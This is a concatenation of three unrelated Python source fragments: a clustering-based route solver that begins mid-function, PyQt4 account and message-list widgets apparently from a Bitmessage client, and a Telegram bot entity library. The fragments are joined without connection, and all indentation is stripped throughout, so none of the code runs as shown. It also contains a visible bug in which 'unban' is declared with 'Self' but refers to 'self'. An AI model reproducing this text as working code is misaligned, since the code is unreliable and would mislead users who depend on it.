log.debug("Splitting problem into {0} clusters...".format(cluster_count))
clusters = find_centers(stations, cluster_count)
clusters = self._resolve_cluster_sizes(clusters)
sclusters = self._get_best_supercluster_route(clusters, start, end)
route = [start]
cost = 0
r_maxstops = maxstops - 2
# Get the closest points in the first/last clusters to the start/end
_, from_start = self._get_closest_points([start], sclusters[0].systems)
to_end, _ = self._get_closest_points(sclusters[-1].systems, [end])
# For each cluster...
for i in range(0, len(sclusters)-1):
log.debug("Solving for cluster at index {}...".format(i))
from_cluster = sclusters[i]
to_cluster = sclusters[i+1]
# Get the closest points, disallowing using from_start or to_end
from_end, to_start = self._get_closest_points(from_cluster.systems, to_cluster.systems, [from_start, to_end])
# Work out how many of the stops we should be doing in this cluster
cur_maxstops = min(len(from_cluster.systems), int(round(float(maxstops) * len(from_cluster.systems) / len(stations))))
r_maxstops -= cur_maxstops
# Solve and add to the route. DO NOT allow nested clustering, that makes it all go wrong :)
newroute, newcost = self.solve_basic_with_cost([c for c in from_cluster.systems if c not in [from_start, from_end]], from_start, from_end, cur_maxstops)
route += newroute
cost += newcost
from_start = to_start
newroute, newcost = self.solve_basic_with_cost([c for c in sclusters[-1].systems if c not in [from_start, to_end]], from_start, to_end, r_maxstops)
route += newroute
cost += newcost
route += [end]
return route, cost
def solve_clustered_repeat(self, stations, start, end, maxstops, iterations = cluster_repeat_limit):
result, _ = self.solve_clustered_repeat_with_cost(stations, start, end, maxstops, iterations)
return result
def solve_clustered_repeat_with_cost(self, stations, start, end, maxstops, iterations = cluster_repeat_limit):
minroute = None
mincost = sys.float_info.max
for i in range(0, iterations):
route, cost = self.solve_clustered_with_cost(stations, start, end, maxstops)
if cost < mincost:
mincost = cost
minroute = route
return minroute, mincost
def _resolve_cluster_sizes(self, pclusters):
clusters = list(pclusters)
iterations = 0
while iterations < cluster_iteration_limit:
iterations += 1
for i,c in enumerate(clusters):
if c.is_supercluster:
c.systems = self._resolve_cluster_sizes(c.systems)
if len(c.systems) > cluster_size_max:
log.debug("Splitting oversized cluster {} into two".format(c))
del clusters[i]
newclusters = find_centers(c.systems, 2)
clusters += newclusters
break
lengths = [len(c.systems) for c in clusters]
# If the current state is good, check supercluster size
if min(lengths) >= cluster_size_min and max(lengths) <= cluster_size_max:
if len(clusters) <= supercluster_size_max:
break
else:
# Too many clusters, consolidate
subdiv = int(math.ceil(float(len(clusters)) / supercluster_size_max))
log.debug("Consolidating from {} to {} superclusters".format(len(clusters), subdiv))
clusters = find_centers(clusters, subdiv)
lengths = [len(c.systems) for c in clusters]
# If everything is now valid...
if min(lengths) >= cluster_size_min and max(lengths) <= cluster_size_max and len(clusters) <= supercluster_size_max:
break
log.debug("Using clusters of sizes {} after {} iterations".format(", ".join([str(len(c.systems)) for c in clusters]), iterations))
return clusters
def _get_route_legs(self, stations):
legs = {}
for h in stations:
legs[h] = {}
for s in stations:
for t in stations:
if s.to_string() != t.to_string() and t not in legs[s]:
log.debug("Calculating leg: {0} -> {1}".format(s.name, t.name))
leg = self._route.plot(s, t, self._jump_range)
if leg is None:
log.warning("Hop route could not be calculated: {0} -> {1}".format(s.name, t.name))
legs[s][t] = leg
legs[t][s] = leg
return legs
def _get_viable_routes(self, route, stations, end, maxstops):
# If we have more non-end stops to go...
if len(route) + 1 < maxstops:
nexts = {}
for stn in stations:
# If this station already appears in the route, do more checks
if stn in route or stn == end:
# If stn is in the route at least the number of times it's in the original list, ignore it
# Add 1 to the count if the start station is *also* the same, since this appears in route but not in stations
route_matches = len([rs for rs in route if rs == stn])
stn_matches = len([rs for rs in stations if rs == stn]) + (1 if stn == route[0] else 0)
if route_matches >= stn_matches:
continue
dist = self._calc.solve_cost(route[-1], stn, len(route)-1)
nexts[stn] = dist
mindist = min(nexts.values())
vsnext = []
for stn, dist in nexts.items():
if dist < (mindist * self._diff_limit):
vsnext.append(stn)
vrnext = []
for stn in vsnext:
vrnext = vrnext + self._get_viable_routes(route + [stn], stations, end, maxstops)
return vrnext
# We're at the end
else:
route.append(end)
return [route]
def _get_best_supercluster_route(self, clusters, start, end):
if len(clusters) == 1:
return list(clusters)
first = min(clusters, key=lambda t: t.get_closest(start)[1])
last = min([c for c in clusters if c != first], key=lambda t: t.get_closest(end)[1])
log.debug("Calculating supercluster route from {} --> {}".format(first, last))
log.debug("Clusters: {}".format(clusters))
if len(clusters) > 3:
log.debug("Calculating cluster route for {}".format(clusters))
inter, _ = self._get_best_cluster_route([c for c in clusters if c not in [first, last]], first, last)
else:
inter = [c for c in clusters if c not in [first, last]]
proute = [first] + inter + [last]
route = []
for i,c in enumerate(proute):
if isinstance(c, _Cluster) and c.is_supercluster:
log.debug("Going deeper... i={}, c={}".format(i, c))
route += self._get_best_supercluster_route(c.systems, start if i == 0 else route[i-1], end if i >= len(route)-1 else route[i+1])
else:
route.append(c)
return route
def _get_best_cluster_route(self, clusters, start, end, route = []):
best = None
bestcost = sys.float_info.max
if not route:
log.debug("In get_best_cluster_route, input = {}, start = {}, end = {}".format(clusters, start, end))
if len(route) < len(clusters):
startpt = route[-1].position if any(route) else start.position
sclusters = sorted([c for c in clusters if c not in route], key=lambda t: (startpt - t.position).length)
# print("route:", route, "smeans:", smeans)
for i in range(0, min(len(sclusters), cluster_route_search_limit)):
c_route, c_cost = self._get_best_cluster_route(clusters, start, end, route + [sclusters[i]])
if c_cost < bestcost:
best = c_route
bestcost = c_cost
else:
cur_cost = (start.position - route[0].position).length
for i in range(1, len(route)):
cur_cost += (route[i-1].position - route[i].position).length
cur_cost += (route[-1].position - end.position).length
best = route
bestcost = cur_cost
return (best, bestcost)
def _get_closest_points(self, cluster1, cluster2, disallowed = []):
best = None
bestcost = None
for n1 in cluster1:
if n1 in disallowed and len(cluster1) > 1: # If len(cluster) is 1, start == end so allow it
continue
for n2 in cluster2:
if n2 in disallowed and len(cluster2) > 1: # If len(cluster) is 1, start == end so allow it
continue
cost = self._calc.solve_cost(n1, n2, 1)
if best is None or cost < bestcost:
best = (n1, n2)
bestcost = cost
return best
#
# K-means clustering
#
def _cluster_points(X, mu):
clusters = [[] for i in range(len(mu))]
for x in X:
bestmukey = min([(i[0], (x.position - mu[i[0]]).length) for i in enumerate(mu)], key=lambda t: t[1])[0]
clusters[bestmukey].append(x)
return clusters
def _reevaluate_centers(mu, clusters):
newmu = []
for c in clusters:
newmu.append(vector3.mean([x.position for x in c]))
return newmu
def _has_converged(mu, oldmu):
return (set(mu) == set(oldmu))
def find_centers(X, K):
# Initialize to K random centers
oldmu = random.sample([x.position for x in X], K)
mu = random.sample([x.position for x in X], K)
clusters = _cluster_points(X, mu)
while not _has_converged(mu, oldmu):
oldmu = mu
# Assign all points in X to clusters
clusters = _cluster_points(X, mu)
# Reevaluate centers
mu = _reevaluate_centers(oldmu, clusters)
return [_Cluster(clusters[i], mu[i]) for i in range(len(mu))]
| |
"""
Folder tree and messagelist widgets definitions.
"""
# pylint: disable=too-many-arguments,bad-super-call
# pylint: disable=attribute-defined-outside-init
from cgi import escape
from PyQt4 import QtCore, QtGui
from bmconfigparser import BMConfigParser
from helper_sql import sqlExecute, sqlQuery
from settingsmixin import SettingsMixin
from tr import _translate
from utils import avatarize
# for pylupdate
_translate("MainWindow", "inbox")
_translate("MainWindow", "new")
_translate("MainWindow", "sent")
_translate("MainWindow", "trash")
TimestampRole = QtCore.Qt.UserRole + 1
class AccountMixin(object):
"""UI-related functionality for accounts"""
ALL = 0
NORMAL = 1
CHAN = 2
MAILINGLIST = 3
SUBSCRIPTION = 4
BROADCAST = 5
def accountColor(self):
"""QT UI color for an account"""
if not self.isEnabled:
return QtGui.QColor(128, 128, 128)
elif self.type == self.CHAN:
return QtGui.QColor(216, 119, 0)
elif self.type in [self.MAILINGLIST, self.SUBSCRIPTION]:
return QtGui.QColor(137, 4, 177)
return QtGui.QApplication.palette().text().color()
def folderColor(self):
"""QT UI color for a folder"""
if not self.parent().isEnabled:
return QtGui.QColor(128, 128, 128)
return QtGui.QApplication.palette().text().color()
def accountBrush(self):
"""Account brush (for QT UI)"""
brush = QtGui.QBrush(self.accountColor())
brush.setStyle(QtCore.Qt.NoBrush)
return brush
def folderBrush(self):
"""Folder brush (for QT UI)"""
brush = QtGui.QBrush(self.folderColor())
brush.setStyle(QtCore.Qt.NoBrush)
return brush
def accountString(self):
"""Account string suitable for use in To: field: label <address>"""
label = self._getLabel()
return (
self.address if label == self.address
else '%s <%s>' % (label, self.address)
)
def setAddress(self, address):
"""Set bitmessage address of the object"""
if address is None:
self.address = None
else:
self.address = str(address)
def setUnreadCount(self, cnt):
"""Set number of unread messages"""
try:
if self.unreadCount == int(cnt):
return
except AttributeError:
pass
self.unreadCount = int(cnt)
if isinstance(self, QtGui.QTreeWidgetItem):
self.emitDataChanged()
def setEnabled(self, enabled):
"""Set account enabled (QT UI)"""
self.isEnabled = enabled
try:
self.setExpanded(enabled)
except AttributeError:
pass
if isinstance(self, Ui_AddressWidget):
for i in range(self.childCount()):
if isinstance(self.child(i), Ui_FolderWidget):
self.child(i).setEnabled(enabled)
if isinstance(self, QtGui.QTreeWidgetItem):
self.emitDataChanged()
def setType(self):
"""Set account type (QT UI)"""
self.setFlags(self.flags() | QtCore.Qt.ItemIsEditable)
if self.address is None:
self.type = self.ALL
self.setFlags(self.flags() & ~QtCore.Qt.ItemIsEditable)
elif BMConfigParser().safeGetBoolean(self.address, 'chan'):
self.type = self.CHAN
elif BMConfigParser().safeGetBoolean(self.address, 'mailinglist'):
self.type = self.MAILINGLIST
elif sqlQuery(
'''select label from subscriptions where address=?''', self.address):
self.type = AccountMixin.SUBSCRIPTION
else:
self.type = self.NORMAL
def defaultLabel(self):
"""Default label (in case no label is set manually)"""
queryreturn = None
retval = None
if self.type in (
AccountMixin.NORMAL,
AccountMixin.CHAN, AccountMixin.MAILINGLIST):
try:
retval = unicode(
BMConfigParser().get(self.address, 'label'), 'utf-8')
except Exception:
queryreturn = sqlQuery(
'''select label from addressbook where address=?''', self.address)
elif self.type == AccountMixin.SUBSCRIPTION:
queryreturn = sqlQuery(
'''select label from subscriptions where address=?''', self.address)
if queryreturn is not None:
if queryreturn != []:
for row in queryreturn:
retval, = row
retval = unicode(retval, 'utf-8')
elif self.address is None or self.type == AccountMixin.ALL:
return unicode(
str(_translate("MainWindow", "All accounts")), 'utf-8')
return retval or unicode(self.address, 'utf-8')
class BMTreeWidgetItem(QtGui.QTreeWidgetItem, AccountMixin):
"""A common abstract class for Tree widget item"""
def __init__(self, parent, pos, address, unreadCount):
super(QtGui.QTreeWidgetItem, self).__init__()
self.setAddress(address)
self.setUnreadCount(unreadCount)
self._setup(parent, pos)
def _getAddressBracket(self, unreadCount=False):
return " (" + str(self.unreadCount) + ")" if unreadCount else ""
def data(self, column, role):
"""Override internal QT method for returning object data"""
if column == 0:
if role == QtCore.Qt.DisplayRole:
return self._getLabel() + self._getAddressBracket(
self.unreadCount > 0)
elif role == QtCore.Qt.EditRole:
return self._getLabel()
elif role == QtCore.Qt.ToolTipRole:
return self._getLabel() + self._getAddressBracket(False)
elif role == QtCore.Qt.FontRole:
font = QtGui.QFont()
font.setBold(self.unreadCount > 0)
return font
return super(BMTreeWidgetItem, self).data(column, role)
class Ui_FolderWidget(BMTreeWidgetItem):
"""Item in the account/folder tree representing a folder"""
folderWeight = {"inbox": 1, "new": 2, "sent": 3, "trash": 4}
def __init__(
self, parent, pos=0, address="", folderName="", unreadCount=0):
self.setFolderName(folderName)
super(Ui_FolderWidget, self).__init__(
parent, pos, address, unreadCount)
def _setup(self, parent, pos):
parent.insertChild(pos, self)
def _getLabel(self):
return _translate("MainWindow", self.folderName)
def setFolderName(self, fname):
"""Set folder name (for QT UI)"""
self.folderName = str(fname)
def data(self, column, role):
"""Override internal QT method for returning object data"""
if column == 0 and role == QtCore.Qt.ForegroundRole:
return self.folderBrush()
return super(Ui_FolderWidget, self).data(column, role)
# inbox, sent, thrash first, rest alphabetically
def __lt__(self, other):
if isinstance(other, Ui_FolderWidget):
if self.folderName in self.folderWeight:
x = self.folderWeight[self.folderName]
else:
x = 99
if other.folderName in self.folderWeight:
y = self.folderWeight[other.folderName]
else:
y = 99
reverse = QtCore.Qt.DescendingOrder == \
self.treeWidget().header().sortIndicatorOrder()
if x == y:
return self.folderName < other.folderName
return x >= y if reverse else x < y
return super(QtGui.QTreeWidgetItem, self).__lt__(other)
class Ui_AddressWidget(BMTreeWidgetItem, SettingsMixin):
"""Item in the account/folder tree representing an account"""
def __init__(self, parent, pos=0, address=None, unreadCount=0, enabled=True):
super(Ui_AddressWidget, self).__init__(
parent, pos, address, unreadCount)
self.setEnabled(enabled)
def _setup(self, parent, pos):
self.setType()
parent.insertTopLevelItem(pos, self)
def _getLabel(self):
if self.address is None:
return unicode(_translate(
"MainWindow", "All accounts").toUtf8(), 'utf-8', 'ignore')
else:
try:
return unicode(
BMConfigParser().get(self.address, 'label'),
'utf-8', 'ignore')
except:
return unicode(self.address, 'utf-8')
def _getAddressBracket(self, unreadCount=False):
ret = "" if self.isExpanded() \
else super(Ui_AddressWidget, self)._getAddressBracket(unreadCount)
if self.address is not None:
ret += " (" + self.address + ")"
return ret
def data(self, column, role):
"""Override internal QT method for returning object data"""
if column == 0:
if role == QtCore.Qt.DecorationRole:
return avatarize(
self.address or self._getLabel().encode('utf8'))
elif role == QtCore.Qt.ForegroundRole:
return self.accountBrush()
return super(Ui_AddressWidget, self).data(column, role)
def setData(self, column, role, value):
"""Save account label (if you edit in the the UI, this will be triggered and will save it to keys.dat)"""
if role == QtCore.Qt.EditRole \
and self.type != AccountMixin.SUBSCRIPTION:
BMConfigParser().set(
str(self.address), 'label',
str(value.toString().toUtf8())
if isinstance(value, QtCore.QVariant)
else value.encode('utf-8')
)
BMConfigParser().save()
return super(Ui_AddressWidget, self).setData(column, role, value)
def setAddress(self, address):
"""Set address to object (for QT UI)"""
super(Ui_AddressWidget, self).setAddress(address)
self.setData(0, QtCore.Qt.UserRole, self.address)
def _getSortRank(self):
return self.type if self.isEnabled else (self.type + 100)
# label (or address) alphabetically, disabled at the end
def __lt__(self, other):
# pylint: disable=protected-access
if isinstance(other, Ui_AddressWidget):
reverse = QtCore.Qt.DescendingOrder == \
self.treeWidget().header().sortIndicatorOrder()
if self._getSortRank() == other._getSortRank():
x = self._getLabel().lower()
y = other._getLabel().lower()
return x < y
return (
not reverse
if self._getSortRank() < other._getSortRank() else reverse
)
return super(QtGui.QTreeWidgetItem, self).__lt__(other)
class Ui_SubscriptionWidget(Ui_AddressWidget):
"""Special treating of subscription addresses"""
# pylint: disable=unused-argument
def __init__(self, parent, pos=0, address="", unreadCount=0, label="", enabled=True):
super(Ui_SubscriptionWidget, self).__init__(
parent, pos, address, unreadCount, enabled)
def _getLabel(self):
queryreturn = sqlQuery(
'''select label from subscriptions where address=?''', self.address)
if queryreturn != []:
for row in queryreturn:
retval, = row
return unicode(retval, 'utf-8', 'ignore')
return unicode(self.address, 'utf-8')
def setType(self):
"""Set account type"""
super(Ui_SubscriptionWidget, self).setType() # sets it editable
self.type = AccountMixin.SUBSCRIPTION # overrides type
def setData(self, column, role, value):
"""Save subscription label to database"""
if role == QtCore.Qt.EditRole:
if isinstance(value, QtCore.QVariant):
label = str(
value.toString().toUtf8()).decode('utf-8', 'ignore')
else:
label = unicode(value, 'utf-8', 'ignore')
sqlExecute(
'''UPDATE subscriptions SET label=? WHERE address=?''',
label, self.address)
return super(Ui_SubscriptionWidget, self).setData(column, role, value)
class BMTableWidgetItem(QtGui.QTableWidgetItem, SettingsMixin):
"""A common abstract class for Table widget item"""
def __init__(self, label=None, unread=False):
super(QtGui.QTableWidgetItem, self).__init__()
self.setLabel(label)
self.setUnread(unread)
self._setup()
def _setup(self):
self.setFlags(QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsEnabled)
def setLabel(self, label):
"""Set object label"""
self.label = label
def setUnread(self, unread):
"""Set/unset read state of an item"""
self.unread = unread
def data(self, role):
"""Return object data (QT UI)"""
if role in (
QtCore.Qt.DisplayRole, QtCore.Qt.EditRole, QtCore.Qt.ToolTipRole
):
return self.label
elif role == QtCore.Qt.FontRole:
font = QtGui.QFont()
font.setBold(self.unread)
return font
return super(BMTableWidgetItem, self).data(role)
class BMAddressWidget(BMTableWidgetItem, AccountMixin):
"""A common class for Table widget item with account"""
def _setup(self):
super(BMAddressWidget, self)._setup()
self.setEnabled(True)
self.setType()
def _getLabel(self):
return self.label
def data(self, role):
"""Return object data (QT UI)"""
if role == QtCore.Qt.ToolTipRole:
return self.label + " (" + self.address + ")"
elif role == QtCore.Qt.DecorationRole:
if BMConfigParser().safeGetBoolean(
'bitmessagesettings', 'useidenticons'):
return avatarize(self.address or self.label)
elif role == QtCore.Qt.ForegroundRole:
return self.accountBrush()
return super(BMAddressWidget, self).data(role)
class MessageList_AddressWidget(BMAddressWidget):
"""Address item in a messagelist"""
def __init__(self, address=None, label=None, unread=False):
self.setAddress(address)
super(MessageList_AddressWidget, self).__init__(label, unread)
def setLabel(self, label=None):
"""Set label"""
super(MessageList_AddressWidget, self).setLabel(label)
if label is not None:
return
newLabel = self.address
queryreturn = None
if self.type in (
AccountMixin.NORMAL,
AccountMixin.CHAN, AccountMixin.MAILINGLIST):
try:
newLabel = unicode(
BMConfigParser().get(self.address, 'label'),
'utf-8', 'ignore')
except:
queryreturn = sqlQuery(
'''select label from addressbook where address=?''', self.address)
elif self.type == AccountMixin.SUBSCRIPTION:
queryreturn = sqlQuery(
'''select label from subscriptions where address=?''', self.address)
if queryreturn:
for row in queryreturn:
newLabel = unicode(row[0], 'utf-8', 'ignore')
self.label = newLabel
def data(self, role):
"""Return object data (QT UI)"""
if role == QtCore.Qt.UserRole:
return self.address
return super(MessageList_AddressWidget, self).data(role)
def setData(self, role, value):
"""Set object data"""
if role == QtCore.Qt.EditRole:
self.setLabel()
return super(MessageList_AddressWidget, self).setData(role, value)
# label (or address) alphabetically, disabled at the end
def __lt__(self, other):
if isinstance(other, MessageList_AddressWidget):
return self.label.lower() < other.label.lower()
return super(QtGui.QTableWidgetItem, self).__lt__(other)
class MessageList_SubjectWidget(BMTableWidgetItem):
"""Message list subject item"""
def __init__(self, subject=None, label=None, unread=False):
self.setSubject(subject)
super(MessageList_SubjectWidget, self).__init__(label, unread)
def setSubject(self, subject):
"""Set subject"""
self.subject = subject
def data(self, role):
"""Return object data (QT UI)"""
if role == QtCore.Qt.UserRole:
return self.subject
if role == QtCore.Qt.ToolTipRole:
return escape(unicode(self.subject, 'utf-8'))
return super(MessageList_SubjectWidget, self).data(role)
# label (or address) alphabetically, disabled at the end
def __lt__(self, other):
if isinstance(other, MessageList_SubjectWidget):
return self.label.lower() < other.label.lower()
return super(QtGui.QTableWidgetItem, self).__lt__(other)
# In order for the time columns on the Inbox and Sent tabs to be sorted
# correctly (rather than alphabetically), we need to overload the <
# operator and use this class instead of QTableWidgetItem.
class MessageList_TimeWidget(BMTableWidgetItem):
"""
A subclass of QTableWidgetItem for received (lastactiontime) field.
'<' operator is overloaded to sort by TimestampRole == 33
msgid is available by QtCore.Qt.UserRole
"""
def __init__(self, label=None, unread=False, timestamp=None, msgid=''):
super(MessageList_TimeWidget, self).__init__(label, unread)
self.setData(QtCore.Qt.UserRole, QtCore.QByteArray(msgid))
self.setData(TimestampRole, int(timestamp))
def __lt__(self, other):
return self.data(TimestampRole) < other.data(TimestampRole)
def data(self, role=QtCore.Qt.UserRole):
"""
Returns expected python types for QtCore.Qt.UserRole and TimestampRole
custom roles and super for any Qt role
"""
data = super(MessageList_TimeWidget, self).data(role)
if role == TimestampRole:
return int(data.toPyObject())
if role == QtCore.Qt.UserRole:
return str(data.toPyObject())
return data
class Ui_AddressBookWidgetItem(BMAddressWidget):
"""Addressbook item"""
# pylint: disable=unused-argument
def __init__(self, label=None, acc_type=AccountMixin.NORMAL):
self.type = acc_type
super(Ui_AddressBookWidgetItem, self).__init__(label=label)
def data(self, role):
"""Return object data"""
if role == QtCore.Qt.UserRole:
return self.type
return super(Ui_AddressBookWidgetItem, self).data(role)
def setData(self, role, value):
"""Set data"""
if role == QtCore.Qt.EditRole:
self.label = str(
value.toString().toUtf8()
if isinstance(value, QtCore.QVariant) else value
)
if self.type in (
AccountMixin.NORMAL,
AccountMixin.MAILINGLIST, AccountMixin.CHAN):
try:
BMConfigParser().get(self.address, 'label')
BMConfigParser().set(self.address, 'label', self.label)
BMConfigParser().save()
except:
sqlExecute('''UPDATE addressbook set label=? WHERE address=?''', self.label, self.address)
elif self.type == AccountMixin.SUBSCRIPTION:
sqlExecute('''UPDATE subscriptions set label=? WHERE address=?''', self.label, self.address)
else:
pass
return super(Ui_AddressBookWidgetItem, self).setData(role, value)
def __lt__(self, other):
if isinstance(other, Ui_AddressBookWidgetItem):
reverse = QtCore.Qt.DescendingOrder == \
self.tableWidget().horizontalHeader().sortIndicatorOrder()
if self.type == other.type:
return self.label.lower() < other.label.lower()
return not reverse if self.type < other.type else reverse
return super(QtGui.QTableWidgetItem, self).__lt__(other)
class Ui_AddressBookWidgetItemLabel(Ui_AddressBookWidgetItem):
"""Addressbook label item"""
def __init__(self, address, label, acc_type):
self.address = address
super(Ui_AddressBookWidgetItemLabel, self).__init__(label, acc_type)
def data(self, role):
"""Return object data"""
self.label = self.defaultLabel()
return super(Ui_AddressBookWidgetItemLabel, self).data(role)
class Ui_AddressBookWidgetItemAddress(Ui_AddressBookWidgetItem):
"""Addressbook address item"""
def __init__(self, address, label, acc_type):
self.address = address
super(Ui_AddressBookWidgetItemAddress, self).__init__(address, acc_type)
def data(self, role):
"""Return object data"""
if role == QtCore.Qt.ToolTipRole:
return self.address
if role == QtCore.Qt.DecorationRole:
return None
return super(Ui_AddressBookWidgetItemAddress, self).data(role)
class AddressBookCompleter(QtGui.QCompleter):
"""Addressbook completer"""
def __init__(self):
super(AddressBookCompleter, self).__init__()
self.cursorPos = -1
def onCursorPositionChanged(self, oldPos, newPos): # pylint: disable=unused-argument
"""Callback for cursor position change"""
if oldPos != self.cursorPos:
self.cursorPos = -1
def splitPath(self, path):
"""Split on semicolon"""
text = unicode(path.toUtf8(), 'utf-8')
return [text[:self.widget().cursorPosition()].split(';')[-1].strip()]
def pathFromIndex(self, index):
"""Perform autocompletion (reimplemented QCompleter method)"""
autoString = unicode(
index.data(QtCore.Qt.EditRole).toString().toUtf8(), 'utf-8')
text = unicode(self.widget().text().toUtf8(), 'utf-8')
# If cursor position was saved, restore it, else save it
if self.cursorPos != -1:
self.widget().setCursorPosition(self.cursorPos)
else:
self.cursorPos = self.widget().cursorPosition()
# Get current prosition
curIndex = self.widget().cursorPosition()
# prev_delimiter_index should actually point at final white space
# AFTER the delimiter
# Get index of last delimiter before current position
prevDelimiterIndex = text[0:curIndex].rfind(";")
while text[prevDelimiterIndex + 1] == " ":
prevDelimiterIndex += 1
# Get index of first delimiter after current position
# (or EOL if no delimiter after cursor)
nextDelimiterIndex = text.find(";", curIndex)
if nextDelimiterIndex == -1:
nextDelimiterIndex = len(text)
# Get part of string that occurs before cursor
part1 = text[0:prevDelimiterIndex + 1]
# Get string value from before auto finished string is selected
# pre = text[prevDelimiterIndex + 1:curIndex - 1]
# Get part of string that occurs AFTER cursor
part2 = text[nextDelimiterIndex:]
return part1 + autoString + part2
| |
from tgbot.entities import *
from tgbot.entities.files import *
from tgbot.entities.location import *
class Chat(RequestingEntity):
def __init__(self, api):
RequestingEntity.__init__(self, {
"id": ("id", None),
"type": ("type", None),
"title": ("title", None),
"username": ("username", None),
"first_name": ("first_name", None),
"last_name": ("last_name", None)
}, api)
def send_message(self, text = "", parse_mode = None, disable_web_page_review = False, disable_notification = False, reply_to_message = None, reply_markup = None):
if self.id == None or self.api == None: raise Exception("Can't send API requests with this chat instance")
return self.api.send_message(
chat_id = self.id,
text = text,
parse_mode = parse_mode,
disable_web_page_review = disable_web_page_review,
disable_notification = disable_notification,
reply_to_message_id = reply_to_message.id if reply_to_message != None else None,
reply_markup = reply_markup.json() if reply_markup != None else None)
def send_photo(self, photo, caption = None, disable_notification = False, reply_markup = None):
if self.id == None or self.api == None: raise Exception("Can't send API requests with this chat instance")
return self.api.send_photo(
chat_id = self.id,
photo = photo,
caption = caption,
disable_notification = disable_notification,
reply_markup = reply_markup.json() if reply_markup != None else None)
def send_audio(self, audio, duration = None, performer = None, title = None, disable_notification = False, reply_markup = None):
if self.id == None or self.api == None: raise Exception("Can't send API requests with this chat instance")
return self.api.send_audio(
chat_id = self.id,
audio = audio,
duration = duration,
performer = performer,
title = title,
disable_notification = disable_notification,
reply_markup = reply_markup.json() if reply_markup != None else None)
def send_document(self, document, caption = None, disable_notification = False, reply_markup = None):
if self.id == None or self.api == None: raise Exception("Can't send API requests with this chat instance")
return self.api.send_document(
chat_id = self.id,
document = document,
caption = caption,
disable_notification = disable_notification,
reply_markup = reply_markup.json() if reply_markup != None else None)
def send_sticker(self, sticker, disable_notification = False, reply_markup = None):
if self.id == None or self.api == None: raise Exception("Can't send API requests with this chat instance")
return self.api.send_sticker(
chat_id = self.id,
sticker = sticker,
disable_notification = disable_notification,
reply_markup = reply_markup.json() if reply_markup != None else None)
def send_video(self, video, duration = None, width = None, height = None, caption = None, disable_notification = False, reply_markup = None):
if self.id == None or self.api == None: raise Exception("Can't send API requests with this chat instance")
return self.api.send_video(
chat_id = self.id,
video = video,
duration = duration,
width = width,
height = height,
caption = caption,
disable_notification = disable_notification,
reply_markup = reply_markup.json() if reply_markup != None else None)
def send_voice(self, voice, duration = None, disable_notification = False, reply_markup = None):
if self.id == None or self.api == None: raise Exception("Can't send API requests with this chat instance")
return self.api.send_voice(
chat_id = self.id,
voice = voice,
duration = duration,
disable_notification = disable_notification,
reply_markup = reply_markup.json() if reply_markup != None else None)
def send_location(self, longitude, latitude, disable_notification = False, reply_markup = None):
if self.id == None or self.api == None: raise Exception("Can't send API requests with this chat instance")
return self.api.send_location(
chat_id = self.id,
longitude = longitude,
latitude = latitude,
disable_notification = disable_notification,
reply_markup = reply_markup.json() if reply_markup != None else None)
def send_venue(self, longitude, latitude, title, address, foursquare_id = None, disable_notification = False, reply_markup = None):
if self.id == None or self.api == None: raise Exception("Can't send API requests with this chat instance")
return self.api.send_venue(
chat_id = self.id,
longitude = longitude,
latitude = latitude,
title = title,
address = address,
foursquare_id = foursquare_id,
disable_notification = disable_notification,
reply_markup = reply_markup.json() if reply_markup != None else None)
def send_contact(self, phone_number, first_name, last_name = None, disable_notification = False, reply_markup = None):
if self.id == None or self.api == None: raise Exception("Can't send API requests with this chat instance")
return self.api.send_contact(
chat_id = self.id,
phone_number = phone_number,
first_name = first_name,
last_name = last_name,
disable_notification = disable_notification,
reply_markup = reply_markup.json() if reply_markup != None else None)
def send_action(self, action):
if self.id == None or self.api == None: raise Exception("Can't send API requests with this chat instance")
return self.api.send_chat_action(chat_id = self.id, action = action)
def leave(self):
if self.id == None or self.api == None: raise Exception("Can't send API requests with this chat instance")
return self.api.leave_chat(chat_id = self.id)
def kick(self, user):
if self.id == None or self.api == None: raise Exception("Can't send API requests with this chat instance")
return self.api.kick_chat_member(chat_id = self.id, user_id = user.id)
def unban(Self, user):
if self.id == None or self.api == None: raise Exception("Can't send API requests with this chat instance")
return self.api.unban_chat_member(chat_id = self.id, user_id = user.id)
class User(Entity):
def __init__(self):
Entity.__init__(self, {
"id": ("id", None),
"first_name": ("first_name", None),
"last_name": ("last_name", None),
"username": ("username", None)
})
class MessageEntity(Entity):
def __init__(self):
Entity.__init__(self, {
"type": ("type", None),
"offset": ("offset", None),
"length": ("length", None),
"url": ("url", None),
})
def _set_props(self, values = {}):
Entity._set_props(self, values)
self.user = User.build(values["user"]) if "user" in values else None
class Message(RequestingEntity):
def __init__(self, api):
RequestingEntity.__init__(self, {
"id": ("message_id", None),
"date": ("date", 0),
"forward_date": ("forward_date", None),
"edit_date": ("edit_date", None),
"text": ("text", ""),
"caption": ("caption", None),
"new_chat_title": ("new_chat_title", None),
"delete_chat_photo": ("delete_chat_photo", False),
"group_chat_created": ("group_chat_created", False),
"supergroup_chat_created": ("supergroup_chat_created", False),
"channel_chat_created": ("channel_chat_created", False),
"migrate_to_chat_id": ("migrate_to_chat_id", None),
"migrate_from_chat_id": ("migrate_from_chat_id", None),
}, api)
def _update_msg_cb(self, message):
self.text = message.text
self.caption = message.caption
def forward(self, to_chat, disable_notification = False):
if self.api == None or self.id == None:
raise Exception("This message is not sent")
return self.api.forward_message(
chat_id = to_chat.id,
from_chat_id = self.chat_id,
disable_notification = disable_notification,
message_id = self.id)
def reply(self, text = "", parse_mode = None, disable_web_page_review = False, disable_notification = False, reply_markup = None):
if self.api == None or self.id == None:
raise Exception("This message is not sent")
return self.api.send_message(
chat_id = self.chat_id,
text = text,
parse_mode = parse_mode,
disable_web_page_review = disable_web_page_review,
disable_notification = disable_notification,
reply_to_message_id = self.id,
reply_markup = reply_markup.json() if reply_markup != None else None)
def edit_text(self, text, parse_mode = None, reply_markup = None):
if self.api == None or self.id == None:
raise Exception("This message is not sent")
return self.api.edit_message_text(
chat_id = self.chat_id,
message_id = self.id,
text = text,
parse_mode = parse_mode,
reply_markup = reply_markup.json() if reply_markup != None else None).then(self._update_msg_cb)
def edit_caption(self, caption, reply_markup = None):
if self.api == None or self.id == None:
raise Exception("This message is not sent")
return self.api.edit_message_caption(
chat_id = self.chat_id,
message_id = self.id,
caption = caption,
reply_markup = reply_markup.json() if reply_markup != None else None).then(self._update_msg_cb)
def edit_reply_markup(self, reply_markup):
if self.api == None or self.id == None:
raise Exception("This message is not sent")
return self.api.edit_message_reply_markup(
chat_id = self.chat_id,
message_id = self.id,
reply_markup = reply_markup.json())
def is_service_message(self):
return False #TODO
def is_forwarded(self):
return self.forward_from_chat != None
